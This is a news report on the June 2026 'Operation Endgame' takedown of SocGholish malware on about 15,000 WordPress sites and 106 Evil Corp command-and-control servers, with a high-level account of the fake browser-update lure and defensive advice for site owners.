International law enforcement agencies and private security partners executed a coordinated takedown on June 18, 2026, dismantling nearly 15,000 WordPress sites infected with SocGholish malware and shutting down 106 command-and-control servers linked to Evil Corp, one of Russia’s most persistent cybercrime operations.
Operation Endgame
The action, branded “Operation Endgame,” represents one of the most comprehensive enforcement actions ever taken against the SocGholish botnet infrastructure. Coordinating across multiple jurisdictions, law enforcement simultaneously cleaned infected WordPress installations, seized or disrupted command-and-control servers, and sinkholed the 106 domains used to direct the botnet’s activity.
15,000 Infected WordPress Installations and 106 C2 Servers Dismantled
SocGholish has operated since at least 2019, establishing it as one of the longest-running malware distribution networks still active. Over that period, the campaign built a distribution footprint spanning thousands of legitimate WordPress sites repurposed as silent malware relays. The simultaneous cleanup of both the infected site layer and the C2 server layer was designed to prevent operators from simply redirecting surviving infected sites to replacement infrastructure — a tactic Evil Corp has used to maintain continuity after prior enforcement actions.
The Evil Corp Connection
SocGholish is attributed to Evil Corp, a Russia-based cybercrime group responsible for distributing Dridex banking malware, WastedLocker ransomware, and multiple other malware families over more than a decade of operations. Evil Corp members have been the subject of U.S. Treasury sanctions and DOJ indictments since 2019, making this takedown an extension of a multi-year enforcement effort rather than a standalone operation.
Evil Corp’s Prior Malware Families and Resilience to Enforcement
The group has demonstrated significant resilience to prior enforcement actions, repeatedly rebranding malware families and reshuffling infrastructure after previous law enforcement disruptions. The scale of this takedown — targeting both the infected distribution sites and the C2 infrastructure simultaneously — was designed to be more disruptive than piecemeal infrastructure seizures that Evil Corp has historically recovered from.
WordPress as a Malware Distribution Platform
The SocGholish operation’s reliance on compromised WordPress sites makes the campaign distinctive. Rather than standing up purpose-built malicious infrastructure, operators injected redirect scripts into legitimate WordPress installations, using the sites’ existing authority and search engine rankings to reach large audiences.
Visitors to infected WordPress sites were presented with convincing fake browser update dialogs. Clicking the prompt delivered a malicious JavaScript payload that installed banking trojans, ransomware, or credential stealers depending on the operator’s objective at the time of the visit.
Takedown Scope and Limitations
The cleanup of 15,000 infected WordPress sites is a significant operational achievement, but it does not address the underlying vulnerabilities that allowed initial compromise. Outdated WordPress plugins, weak administrative credentials, and unpatched themes remain the primary infection vectors. Site owners whose installations were cleaned should expect re-infection attempts if the root cause vulnerabilities are not addressed.
Residual SocGholish infection across WordPress sites not captured in this takedown also remains possible, as the network had seven years to expand its footprint.
Impact and Takeaway
The SocGholish takedown demonstrates that international law enforcement cooperation can successfully disrupt even long-established botnet infrastructure. Organizations hosting WordPress sites should audit plugin update status, implement web application firewall rules for known JavaScript injection signatures, and monitor outbound redirect activity. End users who visited WordPress sites between 2019 and June 2026 should assess whether fake browser update prompts led to credential or financial data compromise.
